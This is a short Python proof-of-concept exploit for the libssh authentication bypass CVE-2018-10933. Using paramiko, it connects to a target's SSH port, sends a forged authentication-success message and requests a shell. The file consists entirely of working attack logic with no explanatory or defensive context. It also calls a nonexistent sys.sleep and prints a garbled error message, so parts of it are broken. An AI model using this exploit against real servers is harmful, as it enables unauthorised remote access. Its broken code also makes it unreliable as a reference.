└── CVE-2018-10933.py


/CVE-2018-10933.py:
--------------------------------------------------------------------------------
 1 | import paramiko
 2 | import socket
 3 | import sys
 4 | 
 5 | hostname = sys.argv[1]
 6 | 
 7 | nbytes=4096
 8 | port = 22
 9 | 
10 | sock = socket.socket()
11 | 
12 | try:
13 |     sock.connect((hostname, port))
14 |     m = paramiko.message.Message()
15 |     transport = paramiko.transport.Transport(sock)
16 |     transport.start_client()
17 | 
18 |     m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
19 |     transport._send_message(m)
20 | 
21 |     cmd_channel = transport.open_session()
22 |     sys.sleep(10)
23 |     cmd_channel.invoke_shell()
24 | 
25 | except socket.error:
26 |     print("Connection to failed.")
27 |     sys.exit(1)
28 | 


--------------------------------------------------------------------------------